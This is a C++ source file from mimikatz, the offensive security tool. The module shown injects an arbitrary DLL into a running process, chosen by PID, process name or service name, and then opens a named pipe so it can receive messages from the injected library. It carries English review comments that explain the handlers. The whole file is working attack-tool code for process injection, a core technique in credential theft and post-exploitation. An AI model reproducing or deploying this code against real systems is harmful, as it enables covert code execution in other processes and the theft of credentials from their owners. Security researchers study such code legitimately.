/*	Benjamin DELPY `gentilkiwi`
	http://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "mod_mimikatz_inject.h"
#include "..\global.h"

// Single shared pipe endpoint to the last library injected with a communication
// channel (opened in injectInPid, released in closeThisCommunicator).
// NULL whenever no channel is open; injectInPid refuses a second communicating
// injection while it is non-NULL.
mod_pipe * mod_mimikatz_inject::monCommunicator = NULL;

vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_inject::getMimiKatzCommands()
{
	// Registers the three sub-commands of this module (pid, process, service),
	// each bound to its handler and a French help string. Order is the display
	// order used by the command dispatcher.
	vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commands;
	commands.reserve(3);
	commands.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pid, L"pid", L"Injecte une librairire communicante dans un PID"));
	commands.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(process, L"process", L"Injecte une librairire communicante dans un processus"));
	commands.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(service, L"service", L"Injecte une librairire communicante dans un service"));
	return commands;
}

bool mod_mimikatz_inject::process(vector<wstring> * arguments)
{
	// Command handler for "process": <process name> <library path>.
	// Resolves the name to exactly one running process and hands its PID to
	// injectInPid. Always returns true (the command was handled); failures are
	// only reported on outputStream.
	// NOTE(review): assumes the dispatcher guarantees at least one argument —
	// front()/back() on an empty vector are undefined.
	wstring targetName = arguments->front();
	wstring libraryPath = arguments->back();

	mod_process::KIWI_PROCESSENTRY32 entry;
	if(!mod_process::getUniqueForName(&entry, &targetName))
	{
		// Zero or several matching processes: nothing is injected.
		(*outputStream) << L"Trop, ou pas de processus : \'" << targetName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl;
		return true;
	}

	(*outputStream) << L"PROCESSENTRY32(" << targetName << L").th32ProcessID = " << entry.th32ProcessID << endl;
	injectInPid(entry.th32ProcessID, libraryPath);
	return true;
}

bool mod_mimikatz_inject::service(vector<wstring> * arguments)
{
	// Command handler for "service": <service name> <library path>.
	// Resolves the service to its hosting process id, then defers to
	// injectInPid. Always returns true; failures are only reported on
	// outputStream.
	// NOTE(review): assumes the dispatcher guarantees at least one argument —
	// front()/back() on an empty vector are undefined.
	wstring targetService = arguments->front();
	wstring libraryPath = arguments->back();

	mod_service::KIWI_SERVICE_STATUS_PROCESS status;
	if(!mod_service::getUniqueForName(&status, &targetService))
	{
		// Zero or several matching services: nothing is injected.
		(*outputStream) << L"Service unique introuvable : \'" << targetService << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl;
		return true;
	}

	(*outputStream) << L"SERVICE(" << targetService << L").serviceDisplayName = " << status.serviceDisplayName << endl;
	(*outputStream) << L"SERVICE(" << targetService << L").ServiceStatusProcess.dwProcessId = " << status.ServiceStatusProcess.dwProcessId << endl;
	injectInPid(status.ServiceStatusProcess.dwProcessId, libraryPath);
	return true;
}

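bool mod_mimikatz_inject::pid(vector<wstring> * arguments)
{
	// Command handler for "pid": <pid> <library path> [extra argument].
	// A third argument selects the legacy mode without a communication pipe.
	// Always returns true (the command was handled); problems are only
	// reported on outputStream.
	// NOTE(review): assumes the dispatcher guarantees at least one argument —
	// front()/back() on an empty vector are undefined.
	wstring strPid = arguments->front();
	wstring fullLib = arguments->back();

	// Initialise before extracting: when the stream extraction fails the
	// target would otherwise hold an indeterminate value, and the original
	// code passed that value on to injectInPid unchecked.
	DWORD pid = 0;
	wstringstream monStream(strPid);
	monStream >> pid;
	if(monStream.fail())
	{
		(*outputStream) << L"Erreur : PID invalide : \'" << strPid << L"\'" << endl;
		return true;
	}

	// isComm is true only when no third argument was supplied.
	injectInPid(pid, fullLib, !(arguments->size() >= 3));

	return true;
}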

// Loads libPath into the process identified by pid via mod_inject::injectLibraryInPid.
// When isComm is true, additionally opens the shared named-pipe server
// (monCommunicator) and waits for the injected library's first message.
//
// Parameters:
//   pid     - target process id (taken by reference but not modified here).
//   libPath - path of the library to load (forwarded by address to mod_inject).
//   isComm  - open a communication channel after injecting. The declaration in
//             the header (not shown here) supplies a default; process() and
//             service() omit the argument.
// Returns the result of injectLibraryInPid only: a pipe-setup failure after a
// successful injection still yields true, and a refused call yields false.
bool mod_mimikatz_inject::injectInPid(DWORD & pid, wstring & libPath, bool isComm)
{
	bool reussite = false;

	// Equivalent to (!isComm || !monCommunicator): a second communicating
	// injection is refused while a channel is already open.
	if(!isComm || (isComm && !monCommunicator))
	{
		// Assignment inside the condition is intentional: reussite records the
		// outcome of the injection itself.
		if(reussite = mod_inject::injectLibraryInPid(pid, &libPath))
		{
			if(isComm)
			{
				wstring monBuffer = L"";

				// Owned through the static monCommunicator; released only by
				// closeThisCommunicator() and deliberately left open on success so
				// later commands can reuse the channel.
				monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
				(*outputStream) << L"Attente de connexion du client..." << endl;

				// NOTE(review): presumably blocks until a client connects — confirm
				// against mod_pipe::createServer.
				if(monCommunicator->createServer())
				{
					(*outputStream) << L"Serveur connecté à un client !" << endl;
					if(monCommunicator->readFromPipe(monBuffer))
					{
						(*outputStream) << L"Message du processus :" << endl << monBuffer << endl;
					}
					else
					{
						// Channel is unusable: tear it down so a later attempt is not refused.
						(*outputStream) << L"Erreur : Impossible de lire le premier message ! ; " <<  mod_system::getWinError() << endl;
						closeThisCommunicator();
					}
				}
				else
				{
					(*outputStream) << L"Erreur : Impossible de créer un canal de communication ! ; " << mod_system::getWinError() << endl;
					closeThisCommunicator();
				}
			}
			else
				(*outputStream) << L"Injecté sans communication (legacy)" << endl;
		} else (*outputStream) << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl;
	}
	else (*outputStream) << L"Erreur : un canal de communicaton est déjà ouvert" << endl;

	return reussite;
}


bool mod_mimikatz_inject::closeThisCommunicator()
{
	// Releases the shared pipe endpoint, if one is open, and resets the static
	// so a later communicating injection is accepted again. Idempotent; always
	// returns true.
	if(!monCommunicator)
		return true;

	(*outputStream) << L"Fermeture du canal de communication" << endl;
	delete monCommunicator;
	monCommunicator = NULL;
	return true;
}